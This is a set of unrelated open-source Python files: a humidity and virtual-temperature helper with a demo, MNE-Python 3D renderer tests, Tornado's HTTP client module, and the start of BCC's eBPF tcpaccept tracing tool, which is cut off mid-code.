error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(temperatures_kelvins.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
vapour_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
vapour_pressures_pascals,
exact_dimensions=numpy.array(temperatures_kelvins.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals - vapour_pressures_pascals, 0., allow_nan=True
)
denominator_values = 1. - (
(vapour_pressures_pascals / total_pressures_pascals) * (1. - EPSILON)
)
virtual_temperatures_kelvins = temperatures_kelvins / denominator_values
virtual_temperatures_kelvins[total_pressures_pascals == 0] = (
temperatures_kelvins[total_pressures_pascals == 0]
)
return virtual_temperatures_kelvins
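# --- Illustrative usage sketch (added for demonstration; not part of the
# original module). The numbers below are made-up near-surface values.
if __name__ == '__main__':
    _temperatures_kelvins = numpy.array([290., 300.])
    _pressures_pascals = numpy.array([100000., 95000.])
    _humidities_kg_kg01 = numpy.array([0.008, 0.012])
    _dewpoints_kelvins = specific_humidity_to_dewpoint(
        specific_humidities_kg_kg01=_humidities_kg_kg01,
        temperatures_kelvins=_temperatures_kelvins,
        total_pressures_pascals=_pressures_pascals
    )
    _recovered_kg_kg01 = dewpoint_to_specific_humidity(
        dewpoints_kelvins=_dewpoints_kelvins,
        temperatures_kelvins=_temperatures_kelvins,
        total_pressures_pascals=_pressures_pascals
    )
    print('Dewpoints (K): {0!s}'.format(_dewpoints_kelvins))
    print('Specific humidity in vs. recovered (kg/kg): {0!s} vs. {1!s}'.format(
        _humidities_kg_kg01, _recovered_kg_kg01
    ))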
|
|
# Authors: Alexandre Gramfort <[email protected]>
# Eric Larson <[email protected]>
# Joan Massich <[email protected]>
# Guillaume Favelier <[email protected]>
#
# License: Simplified BSD
import os
import sys
import pytest
import numpy as np
from mne.utils import run_subprocess
from mne.viz import set_3d_backend, get_3d_backend
from mne.viz.backends.renderer import _get_renderer
from mne.viz.backends.tests._utils import (skips_if_not_mayavi,
skips_if_not_pyvistaqt)
from mne.viz.backends._utils import ALLOWED_QUIVER_MODES
@pytest.mark.parametrize('backend', [
pytest.param('mayavi', marks=skips_if_not_mayavi),
pytest.param('pyvistaqt', marks=skips_if_not_pyvistaqt),
pytest.param('foo', marks=pytest.mark.xfail(raises=ValueError)),
])
def test_backend_environment_setup(backend, monkeypatch):
"""Test set up 3d backend based on env."""
monkeypatch.setenv("MNE_3D_BACKEND", backend)
monkeypatch.setattr(
'mne.viz.backends.renderer.MNE_3D_BACKEND', None)
assert os.environ['MNE_3D_BACKEND'] == backend # just double-check
# reload the renderer to check if the 3d backend selection by
# environment variable has been updated correctly
from mne.viz.backends import renderer
renderer.set_3d_backend(backend)
assert renderer.MNE_3D_BACKEND == backend
assert renderer.get_3d_backend() == backend
def test_3d_functions(renderer):
"""Test figure management functions."""
fig = renderer.create_3d_figure((300, 300))
# Mayavi actually needs something in the display to set the title
wrap_renderer = renderer.backend._Renderer(fig=fig)
wrap_renderer.sphere(np.array([0., 0., 0.]), 'w', 1.)
renderer.backend._check_3d_figure(fig)
renderer.set_3d_view(figure=fig, azimuth=None, elevation=None,
focalpoint=(0., 0., 0.), distance=None)
renderer.set_3d_title(figure=fig, title='foo')
renderer.backend._take_3d_screenshot(figure=fig)
renderer.close_3d_figure(fig)
renderer.close_all_3d_figures()
def test_3d_backend(renderer):
"""Test default plot."""
# set data
win_size = (600, 600)
win_color = 'black'
tet_size = 1.0
tet_x = np.array([0, tet_size, 0, 0])
tet_y = np.array([0, 0, tet_size, 0])
tet_z = np.array([0, 0, 0, tet_size])
tet_indices = np.array([[0, 1, 2],
[0, 1, 3],
[0, 2, 3],
[1, 2, 3]])
tet_color = 'white'
sph_center = np.column_stack((tet_x, tet_y, tet_z))
sph_color = 'red'
sph_scale = tet_size / 3.0
ct_scalars = np.array([0.0, 0.0, 0.0, 1.0])
ct_levels = [0.2, 0.4, 0.6, 0.8]
ct_surface = {
"rr": sph_center,
"tris": tet_indices
}
qv_color = 'blue'
qv_scale = tet_size / 2.0
qv_center = np.array([np.mean((sph_center[va, :],
sph_center[vb, :],
sph_center[vc, :]), axis=0)
for (va, vb, vc) in tet_indices])
center = np.mean(qv_center, axis=0)
qv_dir = qv_center - center
qv_scale_mode = 'scalar'
qv_scalars = np.linspace(1.0, 2.0, 4)
txt_x = 0.0
txt_y = 0.0
txt_text = "renderer"
txt_size = 14
cam_distance = 5 * tet_size
# init scene
rend = renderer.create_3d_figure(
size=win_size,
bgcolor=win_color,
smooth_shading=True,
scene=False,
)
for interaction in ('terrain', 'trackball'):
rend.set_interaction(interaction)
# use mesh
mesh_data = rend.mesh(
x=tet_x,
y=tet_y,
z=tet_z,
triangles=tet_indices,
color=tet_color,
)
rend.remove_mesh(mesh_data)
# use contour
rend.contour(surface=ct_surface, scalars=ct_scalars,
contours=ct_levels, kind='line')
rend.contour(surface=ct_surface, scalars=ct_scalars,
contours=ct_levels, kind='tube')
# use sphere
rend.sphere(center=sph_center, color=sph_color,
scale=sph_scale, radius=1.0)
# use quiver3d
kwargs = dict(
x=qv_center[:, 0],
y=qv_center[:, 1],
z=qv_center[:, 2],
u=qv_dir[:, 0],
v=qv_dir[:, 1],
w=qv_dir[:, 2],
color=qv_color,
scale=qv_scale,
scale_mode=qv_scale_mode,
scalars=qv_scalars,
)
for mode in ALLOWED_QUIVER_MODES:
rend.quiver3d(mode=mode, **kwargs)
with pytest.raises(ValueError, match='Invalid value'):
rend.quiver3d(mode='foo', **kwargs)
# use tube
rend.tube(origin=np.array([[0, 0, 0]]),
destination=np.array([[0, 1, 0]]))
_, tube = rend.tube(origin=np.array([[1, 0, 0]]),
destination=np.array([[1, 1, 0]]),
scalars=np.array([[1.0, 1.0]]))
# scalar bar
rend.scalarbar(source=tube, title="Scalar Bar",
bgcolor=[1, 1, 1])
# use text
rend.text2d(x_window=txt_x, y_window=txt_y, text=txt_text,
size=txt_size, justification='right')
rend.text3d(x=0, y=0, z=0, text=txt_text, scale=1.0)
rend.set_camera(azimuth=180.0, elevation=90.0,
distance=cam_distance,
focalpoint=center)
rend.reset_camera()
rend.show()
def test_get_3d_backend(renderer):
"""Test get_3d_backend function call for side-effects."""
# Test twice to ensure the first call had no side-effect
orig_backend = renderer.MNE_3D_BACKEND
assert renderer.get_3d_backend() == orig_backend
assert renderer.get_3d_backend() == orig_backend
def test_renderer(renderer, monkeypatch):
"""Test that renderers are available on demand."""
backend = renderer.get_3d_backend()
cmd = [sys.executable, '-uc',
'import mne; mne.viz.create_3d_figure((800, 600)); '
'backend = mne.viz.get_3d_backend(); '
'assert backend == %r, backend' % (backend,)]
monkeypatch.setenv('MNE_3D_BACKEND', backend)
run_subprocess(cmd)
def test_set_3d_backend_bad(monkeypatch, tmpdir):
"""Test that the error emitted when a bad backend name is used."""
match = "Allowed values are 'pyvistaqt', 'mayavi', and 'notebook'"
with pytest.raises(ValueError, match=match):
set_3d_backend('invalid')
# gh-9607
def fail(x):
raise ModuleNotFoundError(x)
monkeypatch.setattr('mne.viz.backends.renderer._reload_backend', fail)
monkeypatch.setattr(
'mne.viz.backends.renderer.MNE_3D_BACKEND', None)
# avoid using the config
monkeypatch.setenv('_MNE_FAKE_HOME_DIR', str(tmpdir))
match = 'Could not load any valid 3D.*\npyvistaqt: .*'
assert get_3d_backend() is None
with pytest.raises(RuntimeError, match=match):
_get_renderer()
|
|
"""Blocking and non-blocking HTTP client interfaces.
This module defines a common interface shared by two implementations,
``simple_httpclient`` and ``curl_httpclient``. Applications may either
instantiate their chosen implementation class directly or use the
`AsyncHTTPClient` class from this module, which selects an implementation
that can be overridden with the `AsyncHTTPClient.configure` method.
The default implementation is ``simple_httpclient``, and this is expected
to be suitable for most users' needs. However, some applications may wish
to switch to ``curl_httpclient`` for reasons such as the following:
* ``curl_httpclient`` has some features not found in ``simple_httpclient``,
including support for HTTP proxies and the ability to use a specified
network interface.
* ``curl_httpclient`` is more likely to be compatible with sites that are
not-quite-compliant with the HTTP spec, or sites that use little-exercised
features of HTTP.
* ``curl_httpclient`` is faster.
* ``curl_httpclient`` was the default prior to Tornado 2.0.
Note that if you are using ``curl_httpclient``, it is highly
recommended that you use a recent version of ``libcurl`` and
``pycurl``. Currently the minimum supported version of libcurl is
7.21.1, and the minimum version of pycurl is 7.18.2. It is highly
recommended that your ``libcurl`` installation is built with
asynchronous DNS resolver (threaded or c-ares), otherwise you may
encounter various problems with request timeouts (for more
information, see
http://curl.haxx.se/libcurl/c/curl_easy_setopt.html#CURLOPTCONNECTTIMEOUTMS
and comments in curl_httpclient.py).
To select ``curl_httpclient``, call `AsyncHTTPClient.configure` at startup::
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
"""
from __future__ import absolute_import, division, print_function, with_statement
import functools
import time
import weakref
from tornado.concurrent import TracebackFuture
from tornado.escape import utf8, native_str
from tornado import httputil, stack_context
from tornado.ioloop import IOLoop
from tornado.util import Configurable
class HTTPClient(object):
"""A blocking HTTP client.
This interface is provided for convenience and testing; most applications
that are running an IOLoop will want to use `AsyncHTTPClient` instead.
Typical usage looks like this::
http_client = httpclient.HTTPClient()
try:
response = http_client.fetch("http://www.google.com/")
            print(response.body)
except httpclient.HTTPError as e:
# HTTPError is raised for non-200 responses; the response
# can be found in e.response.
print("Error: " + str(e))
except Exception as e:
# Other errors are possible, such as IOError.
print("Error: " + str(e))
http_client.close()
"""
def __init__(self, async_client_class=None, **kwargs):
self._io_loop = IOLoop(make_current=False)
if async_client_class is None:
async_client_class = AsyncHTTPClient
self._async_client = async_client_class(self._io_loop, **kwargs)
self._closed = False
def __del__(self):
self.close()
def close(self):
"""Closes the HTTPClient, freeing any resources used."""
if not self._closed:
self._async_client.close()
self._io_loop.close()
self._closed = True
def fetch(self, request, **kwargs):
"""Executes a request, returning an `HTTPResponse`.
The request may be either a string URL or an `HTTPRequest` object.
If it is a string, we construct an `HTTPRequest` using any additional
kwargs: ``HTTPRequest(request, **kwargs)``
If an error occurs during the fetch, we raise an `HTTPError` unless
the ``raise_error`` keyword argument is set to False.
"""
response = self._io_loop.run_sync(functools.partial(
self._async_client.fetch, request, **kwargs))
return response
class AsyncHTTPClient(Configurable):
"""An non-blocking HTTP client.
Example usage::
def handle_request(response):
if response.error:
print "Error:", response.error
else:
print response.body
http_client = AsyncHTTPClient()
http_client.fetch("http://www.google.com/", handle_request)
The constructor for this class is magic in several respects: It
actually creates an instance of an implementation-specific
subclass, and instances are reused as a kind of pseudo-singleton
(one per `.IOLoop`). The keyword argument ``force_instance=True``
can be used to suppress this singleton behavior. Unless
``force_instance=True`` is used, no arguments other than
``io_loop`` should be passed to the `AsyncHTTPClient` constructor.
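    Because instances are reused as pseudo-singletons, calling the constructor
    twice on the same `.IOLoop` normally returns the same object, while
    ``force_instance=True`` yields a fresh one; a minimal illustrative sketch::
        client = AsyncHTTPClient()
        assert client is AsyncHTTPClient()
        separate_client = AsyncHTTPClient(force_instance=True)
        assert separate_client is not client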
The implementation subclass as well as arguments to its
    constructor can be set with the static method `configure()`.
All `AsyncHTTPClient` implementations support a ``defaults``
keyword argument, which can be used to set default values for
`HTTPRequest` attributes. For example::
AsyncHTTPClient.configure(
None, defaults=dict(user_agent="MyUserAgent"))
# or with force_instance:
client = AsyncHTTPClient(force_instance=True,
defaults=dict(user_agent="MyUserAgent"))
.. versionchanged:: 4.1
The ``io_loop`` argument is deprecated.
"""
@classmethod
def configurable_base(cls):
return AsyncHTTPClient
@classmethod
def configurable_default(cls):
from tornado.simple_httpclient import SimpleAsyncHTTPClient
return SimpleAsyncHTTPClient
@classmethod
def _async_clients(cls):
attr_name = '_async_client_dict_' + cls.__name__
if not hasattr(cls, attr_name):
setattr(cls, attr_name, weakref.WeakKeyDictionary())
return getattr(cls, attr_name)
def __new__(cls, io_loop=None, force_instance=False, **kwargs):
io_loop = io_loop or IOLoop.current()
if force_instance:
instance_cache = None
else:
instance_cache = cls._async_clients()
if instance_cache is not None and io_loop in instance_cache:
return instance_cache[io_loop]
instance = super(AsyncHTTPClient, cls).__new__(cls, io_loop=io_loop,
**kwargs)
# Make sure the instance knows which cache to remove itself from.
# It can't simply call _async_clients() because we may be in
# __new__(AsyncHTTPClient) but instance.__class__ may be
# SimpleAsyncHTTPClient.
instance._instance_cache = instance_cache
if instance_cache is not None:
instance_cache[instance.io_loop] = instance
return instance
def initialize(self, io_loop, defaults=None):
self.io_loop = io_loop
self.defaults = dict(HTTPRequest._DEFAULTS)
if defaults is not None:
self.defaults.update(defaults)
self._closed = False
def close(self):
"""Destroys this HTTP client, freeing any file descriptors used.
This method is **not needed in normal use** due to the way
that `AsyncHTTPClient` objects are transparently reused.
``close()`` is generally only necessary when either the
`.IOLoop` is also being closed, or the ``force_instance=True``
argument was used when creating the `AsyncHTTPClient`.
No other methods may be called on the `AsyncHTTPClient` after
``close()``.
"""
if self._closed:
return
self._closed = True
if self._instance_cache is not None:
if self._instance_cache.get(self.io_loop) is not self:
raise RuntimeError("inconsistent AsyncHTTPClient cache")
del self._instance_cache[self.io_loop]
def fetch(self, request, callback=None, raise_error=True, **kwargs):
"""Executes a request, asynchronously returning an `HTTPResponse`.
The request may be either a string URL or an `HTTPRequest` object.
If it is a string, we construct an `HTTPRequest` using any additional
kwargs: ``HTTPRequest(request, **kwargs)``
This method returns a `.Future` whose result is an
`HTTPResponse`. By default, the ``Future`` will raise an
`HTTPError` if the request returned a non-200 response code
(other errors may also be raised if the server could not be
contacted). Instead, if ``raise_error`` is set to False, the
response will always be returned regardless of the response
code.
If a ``callback`` is given, it will be invoked with the `HTTPResponse`.
In the callback interface, `HTTPError` is not automatically raised.
Instead, you must check the response's ``error`` attribute or
call its `~HTTPResponse.rethrow` method.
"""
if self._closed:
raise RuntimeError("fetch() called on closed AsyncHTTPClient")
if not isinstance(request, HTTPRequest):
request = HTTPRequest(url=request, **kwargs)
# We may modify this (to add Host, Accept-Encoding, etc),
# so make sure we don't modify the caller's object. This is also
# where normal dicts get converted to HTTPHeaders objects.
request.headers = httputil.HTTPHeaders(request.headers)
request = _RequestProxy(request, self.defaults)
future = TracebackFuture()
if callback is not None:
callback = stack_context.wrap(callback)
def handle_future(future):
exc = future.exception()
if isinstance(exc, HTTPError) and exc.response is not None:
response = exc.response
elif exc is not None:
response = HTTPResponse(
request, 599, error=exc,
request_time=time.time() - request.start_time)
else:
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
def handle_response(response):
if raise_error and response.error:
future.set_exception(response.error)
else:
future.set_result(response)
self.fetch_impl(request, handle_response)
return future
def fetch_impl(self, request, callback):
raise NotImplementedError()
@classmethod
def configure(cls, impl, **kwargs):
"""Configures the `AsyncHTTPClient` subclass to use.
``AsyncHTTPClient()`` actually creates an instance of a subclass.
This method may be called with either a class object or the
fully-qualified name of such a class (or ``None`` to use the default,
``SimpleAsyncHTTPClient``)
If additional keyword arguments are given, they will be passed
to the constructor of each subclass instance created. The
keyword argument ``max_clients`` determines the maximum number
of simultaneous `~AsyncHTTPClient.fetch()` operations that can
execute in parallel on each `.IOLoop`. Additional arguments
may be supported depending on the implementation class in use.
Example::
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
"""
super(AsyncHTTPClient, cls).configure(impl, **kwargs)
class HTTPRequest(object):
"""HTTP client request object."""
# Default values for HTTPRequest parameters.
# Merged with the values on the request object by AsyncHTTPClient
# implementations.
_DEFAULTS = dict(
connect_timeout=20.0,
request_timeout=20.0,
follow_redirects=True,
max_redirects=5,
decompress_response=True,
proxy_password='',
allow_nonstandard_methods=False,
validate_cert=True)
def __init__(self, url, method="GET", headers=None, body=None,
auth_username=None, auth_password=None, auth_mode=None,
connect_timeout=None, request_timeout=None,
if_modified_since=None, follow_redirects=None,
max_redirects=None, user_agent=None, use_gzip=None,
network_interface=None, streaming_callback=None,
header_callback=None, prepare_curl_callback=None,
proxy_host=None, proxy_port=None, proxy_username=None,
proxy_password=None, allow_nonstandard_methods=None,
validate_cert=None, ca_certs=None,
allow_ipv6=None,
client_key=None, client_cert=None, body_producer=None,
expect_100_continue=False, decompress_response=None,
ssl_options=None):
r"""All parameters except ``url`` are optional.
:arg string url: URL to fetch
:arg string method: HTTP method, e.g. "GET" or "POST"
:arg headers: Additional HTTP headers to pass on the request
:type headers: `~tornado.httputil.HTTPHeaders` or `dict`
:arg body: HTTP request body as a string (byte or unicode; if unicode
the utf-8 encoding will be used)
:arg body_producer: Callable used for lazy/asynchronous request bodies.
It is called with one argument, a ``write`` function, and should
return a `.Future`. It should call the write function with new
data as it becomes available. The write function returns a
`.Future` which can be used for flow control.
Only one of ``body`` and ``body_producer`` may
be specified. ``body_producer`` is not supported on
``curl_httpclient``. When using ``body_producer`` it is recommended
to pass a ``Content-Length`` in the headers as otherwise chunked
encoding will be used, and many servers do not support chunked
encoding on requests. New in Tornado 4.0
:arg string auth_username: Username for HTTP authentication
:arg string auth_password: Password for HTTP authentication
:arg string auth_mode: Authentication mode; default is "basic".
Allowed values are implementation-defined; ``curl_httpclient``
supports "basic" and "digest"; ``simple_httpclient`` only supports
"basic"
:arg float connect_timeout: Timeout for initial connection in seconds
:arg float request_timeout: Timeout for entire request in seconds
:arg if_modified_since: Timestamp for ``If-Modified-Since`` header
:type if_modified_since: `datetime` or `float`
:arg bool follow_redirects: Should redirects be followed automatically
or return the 3xx response?
:arg int max_redirects: Limit for ``follow_redirects``
:arg string user_agent: String to send as ``User-Agent`` header
:arg bool decompress_response: Request a compressed response from
the server and decompress it after downloading. Default is True.
New in Tornado 4.0.
:arg bool use_gzip: Deprecated alias for ``decompress_response``
since Tornado 4.0.
:arg string network_interface: Network interface to use for request.
``curl_httpclient`` only; see note below.
:arg callable streaming_callback: If set, ``streaming_callback`` will
be run with each chunk of data as it is received, and
``HTTPResponse.body`` and ``HTTPResponse.buffer`` will be empty in
the final response.
:arg callable header_callback: If set, ``header_callback`` will
be run with each header line as it is received (including the
first line, e.g. ``HTTP/1.0 200 OK\r\n``, and a final line
containing only ``\r\n``. All lines include the trailing newline
characters). ``HTTPResponse.headers`` will be empty in the final
response. This is most useful in conjunction with
``streaming_callback``, because it's the only way to get access to
header data while the request is in progress.
:arg callable prepare_curl_callback: If set, will be called with
a ``pycurl.Curl`` object to allow the application to make additional
``setopt`` calls.
:arg string proxy_host: HTTP proxy hostname. To use proxies,
``proxy_host`` and ``proxy_port`` must be set; ``proxy_username`` and
           ``proxy_password`` are optional.  Proxies are currently only supported
with ``curl_httpclient``.
:arg int proxy_port: HTTP proxy port
:arg string proxy_username: HTTP proxy username
:arg string proxy_password: HTTP proxy password
:arg bool allow_nonstandard_methods: Allow unknown values for ``method``
argument?
:arg bool validate_cert: For HTTPS requests, validate the server's
certificate?
:arg string ca_certs: filename of CA certificates in PEM format,
or None to use defaults. See note below when used with
``curl_httpclient``.
:arg string client_key: Filename for client SSL key, if any. See
note below when used with ``curl_httpclient``.
:arg string client_cert: Filename for client SSL certificate, if any.
See note below when used with ``curl_httpclient``.
:arg ssl.SSLContext ssl_options: `ssl.SSLContext` object for use in
``simple_httpclient`` (unsupported by ``curl_httpclient``).
Overrides ``validate_cert``, ``ca_certs``, ``client_key``,
and ``client_cert``.
:arg bool allow_ipv6: Use IPv6 when available? Default is true.
:arg bool expect_100_continue: If true, send the
``Expect: 100-continue`` header and wait for a continue response
before sending the request body. Only supported with
simple_httpclient.
.. note::
When using ``curl_httpclient`` certain options may be
inherited by subsequent fetches because ``pycurl`` does
not allow them to be cleanly reset. This applies to the
``ca_certs``, ``client_key``, ``client_cert``, and
``network_interface`` arguments. If you use these
options, you should pass them on every request (you don't
have to always use the same values, but it's not possible
to mix requests that specify these options with ones that
use the defaults).
.. versionadded:: 3.1
The ``auth_mode`` argument.
.. versionadded:: 4.0
The ``body_producer`` and ``expect_100_continue`` arguments.
.. versionadded:: 4.2
The ``ssl_options`` argument.
"""
# Note that some of these attributes go through property setters
# defined below.
self.headers = headers
if if_modified_since:
self.headers["If-Modified-Since"] = httputil.format_timestamp(
if_modified_since)
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_username = proxy_username
self.proxy_password = proxy_password
self.url = url
self.method = method
self.body = body
self.body_producer = body_producer
self.auth_username = auth_username
self.auth_password = auth_password
self.auth_mode = auth_mode
self.connect_timeout = connect_timeout
self.request_timeout = request_timeout
self.follow_redirects = follow_redirects
self.max_redirects = max_redirects
self.user_agent = user_agent
if decompress_response is not None:
self.decompress_response = decompress_response
else:
self.decompress_response = use_gzip
self.network_interface = network_interface
self.streaming_callback = streaming_callback
self.header_callback = header_callback
self.prepare_curl_callback = prepare_curl_callback
self.allow_nonstandard_methods = allow_nonstandard_methods
self.validate_cert = validate_cert
self.ca_certs = ca_certs
self.allow_ipv6 = allow_ipv6
self.client_key = client_key
self.client_cert = client_cert
self.ssl_options = ssl_options
self.expect_100_continue = expect_100_continue
self.start_time = time.time()
@property
def headers(self):
return self._headers
@headers.setter
def headers(self, value):
if value is None:
self._headers = httputil.HTTPHeaders()
else:
self._headers = value
@property
def body(self):
return self._body
@body.setter
def body(self, value):
self._body = utf8(value)
@property
def body_producer(self):
return self._body_producer
@body_producer.setter
def body_producer(self, value):
self._body_producer = stack_context.wrap(value)
@property
def streaming_callback(self):
return self._streaming_callback
@streaming_callback.setter
def streaming_callback(self, value):
self._streaming_callback = stack_context.wrap(value)
@property
def header_callback(self):
return self._header_callback
@header_callback.setter
def header_callback(self, value):
self._header_callback = stack_context.wrap(value)
@property
def prepare_curl_callback(self):
return self._prepare_curl_callback
@prepare_curl_callback.setter
def prepare_curl_callback(self, value):
self._prepare_curl_callback = stack_context.wrap(value)
class HTTPResponse(object):
"""HTTP Response object.
Attributes:
* request: HTTPRequest object
* code: numeric HTTP status code, e.g. 200 or 404
* reason: human-readable reason phrase describing the status code
* headers: `tornado.httputil.HTTPHeaders` object
* effective_url: final location of the resource after following any
redirects
* buffer: ``cStringIO`` object for response body
* body: response body as string (created on demand from ``self.buffer``)
* error: Exception object, if any
* request_time: seconds from request start to finish
* time_info: dictionary of diagnostic timing information from the request.
Available data are subject to change, but currently uses timings
available from http://curl.haxx.se/libcurl/c/curl_easy_getinfo.html,
plus ``queue``, which is the delay (if any) introduced by waiting for
a slot under `AsyncHTTPClient`'s ``max_clients`` setting.
"""
def __init__(self, request, code, headers=None, buffer=None,
effective_url=None, error=None, request_time=None,
time_info=None, reason=None):
if isinstance(request, _RequestProxy):
self.request = request.request
else:
self.request = request
self.code = code
self.reason = reason or httputil.responses.get(code, "Unknown")
if headers is not None:
self.headers = headers
else:
self.headers = httputil.HTTPHeaders()
self.buffer = buffer
self._body = None
if effective_url is None:
self.effective_url = request.url
else:
self.effective_url = effective_url
if error is None:
if self.code < 200 or self.code >= 300:
self.error = HTTPError(self.code, message=self.reason,
response=self)
else:
self.error = None
else:
self.error = error
self.request_time = request_time
self.time_info = time_info or {}
def _get_body(self):
if self.buffer is None:
return None
elif self._body is None:
self._body = self.buffer.getvalue()
return self._body
body = property(_get_body)
def rethrow(self):
"""If there was an error on the request, raise an `HTTPError`."""
if self.error:
raise self.error
def __repr__(self):
args = ",".join("%s=%r" % i for i in sorted(self.__dict__.items()))
return "%s(%s)" % (self.__class__.__name__, args)
class HTTPError(Exception):
"""Exception thrown for an unsuccessful HTTP request.
Attributes:
* ``code`` - HTTP error integer error code, e.g. 404. Error code 599 is
used when no HTTP response was received, e.g. for a timeout.
* ``response`` - `HTTPResponse` object, if any.
Note that if ``follow_redirects`` is False, redirects become HTTPErrors,
and you can look at ``error.response.headers['Location']`` to see the
destination of the redirect.
"""
def __init__(self, code, message=None, response=None):
self.code = code
self.message = message or httputil.responses.get(code, "Unknown")
self.response = response
super(HTTPError, self).__init__(code, message, response)
def __str__(self):
return "HTTP %d: %s" % (self.code, self.message)
class _RequestProxy(object):
"""Combines an object with a dictionary of defaults.
Used internally by AsyncHTTPClient implementations.
"""
def __init__(self, request, defaults):
self.request = request
self.defaults = defaults
def __getattr__(self, name):
request_attr = getattr(self.request, name)
if request_attr is not None:
return request_attr
elif self.defaults is not None:
return self.defaults.get(name, None)
else:
return None
def main():
from tornado.options import define, options, parse_command_line
define("print_headers", type=bool, default=False)
define("print_body", type=bool, default=True)
define("follow_redirects", type=bool, default=True)
define("validate_cert", type=bool, default=True)
args = parse_command_line()
client = HTTPClient()
for arg in args:
try:
response = client.fetch(arg,
follow_redirects=options.follow_redirects,
validate_cert=options.validate_cert,
)
except HTTPError as e:
if e.response is not None:
response = e.response
else:
raise
if options.print_headers:
print(response.headers)
if options.print_body:
print(native_str(response.body))
client.close()
if __name__ == "__main__":
main()
|
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# tcpaccept Trace TCP accept()s.
# For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: tcpaccept [-h] [-T] [-t] [-p PID] [-P PORTS]
#
# This uses dynamic tracing of the kernel inet_csk_accept() socket function
# (from tcp_prot.accept), and will need to be modified to match kernel changes.
#
# Copyright (c) 2015 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 13-Oct-2015 Brendan Gregg Created this.
# 14-Feb-2016 " " Switch to bpf_perf_output.
from __future__ import print_function
from bcc.containers import filter_by_containers
from bcc import BPF
from socket import inet_ntop, AF_INET, AF_INET6
from struct import pack
import argparse
from bcc.utils import printb
from time import strftime
# arguments
examples = """examples:
./tcpaccept # trace all TCP accept()s
./tcpaccept -t # include timestamps
./tcpaccept -P 80,81 # only trace port 80 and 81
./tcpaccept -p 181 # only trace PID 181
./tcpaccept --cgroupmap mappath # only trace cgroups in this BPF map
./tcpaccept --mntnsmap mappath # only trace mount namespaces in the map
"""
parser = argparse.ArgumentParser(
description="Trace TCP accepts",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-T", "--time", action="store_true",
help="include time column on output (HH:MM:SS)")
parser.add_argument("-t", "--timestamp", action="store_true",
help="include timestamp on output")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("-P", "--port",
help="comma-separated list of local ports to trace")
parser.add_argument("--cgroupmap",
help="trace cgroups in this BPF map only")
parser.add_argument("--mntnsmap",
help="trace mount namespaces in this BPF map only")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
debug = 0
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
// separate data structs for ipv4 and ipv6
struct ipv4_data_t {
u64 ts_us;
u32 pid;
u32 saddr;
u32 daddr;
u64 ip;
u16 lport;
u16 dport;
char task[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(ipv4_events);
struct ipv6_data_t {
u64 ts_us;
u32 pid;
unsigned __int128 saddr;
unsigned __int128 daddr;
u64 ip;
u16 lport;
u16 dport;
char task[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(ipv6_events);
"""
#
# The following code uses kprobes to instrument inet_csk_accept().
# On Linux 4.16 and later, we could use sock:inet_sock_set_state
# tracepoint for efficiency, but it may output wrong PIDs. This is
# because sock:inet_sock_set_state may run outside of process context.
# Hence, we stick to kprobes until we find a proper solution.
#
bpf_text_kprobe = """
int kretprobe__inet_csk_accept(struct pt_regs *ctx)
{
if (container_should_be_filtered()) {
return 0;
}
struct sock *newsk = (struct sock *)PT_REGS_RC(ctx);
u32 pid = bpf_get_current_pid_tgid() >> 32;
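    // bpf_get_current_pid_tgid() packs the thread group id (the user-visible
    // PID) in the upper 32 bits; the shift discards the thread id.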
##FILTER_PID##
if (newsk == NULL)
return 0;
// check this is TCP
u8 protocol = 0;
// workaround for reading the sk_protocol bitfield:
    // Note (comments originally added by Joe Yin): this workaround no longer
    // works as of Linux 4.10, because sk_wmem_queued no longer directly
    // follows the sk_protocol bitfield; the member that follows it is now
    // sk_gso_max_segs. On 4.10+ the protocol byte can instead be read with:
    // bpf_probe_read_kernel(&protocol, 1, (void *)((u64)&newsk->sk_gso_max_segs) - 3);
    // To distinguish pre-4.10 from 4.10+ kernels, compare the offsets of
    // sk_gso_max_segs and sk_lingertime: on 4.10+ the offset between the two
    // members is 4 bytes.
int gso_max_segs_offset = offsetof(struct sock, sk_gso_max_segs);
int sk_lingertime_offset = offsetof(struct sock, sk_lingertime);
if (sk_lingertime_offset - gso_max_segs_offset == 4)
// 4.10+ with little endian
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
protocol = *(u8 *)((u64)&newsk->sk_gso_max_segs - 3);
else
// pre-4.10 with little endian
protocol = *(u8 *)((u64)&newsk->sk_wmem_queued - 3);
#elif __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__
// 4.10+ with big endian
protocol = *(u8 *)((u64)&newsk->sk_gso_max_segs - 1);
else
// pre-4.10 with big endian
protocol = *(u8 *)((u64)&newsk->sk_wmem_queued - 1);
#else
# error "Fix your compiler's __BYTE_ORDER__?!"
#endif
if (protocol != IPPROTO_TCP)
return 0;
// pull in details
u16 family = 0, lport = 0, dport;
family = newsk->__sk_common.skc_family;
lport = newsk->__sk_common.skc_num;
dport = newsk->__sk_common.skc_dport;
dport = ntohs(dport);
##FILTER_PORT##
if (family == AF_INET) {
struct ipv4_data_t data4 = {.pid = pid, .ip = 4};
data4.ts_us = bpf_ktime_get_ns() / 1000;
data4.saddr = newsk->__sk_common.skc_rcv_saddr;
data4.daddr = newsk->__sk_common.skc_daddr;
data4.lport = lport;
data4.dport = dport;
bpf_get_current_comm(&data4.task, sizeof(data4.task));
ipv4_events.perf_submit(ctx, &data4, sizeof(data4));
} else if (family == AF_INET6) {
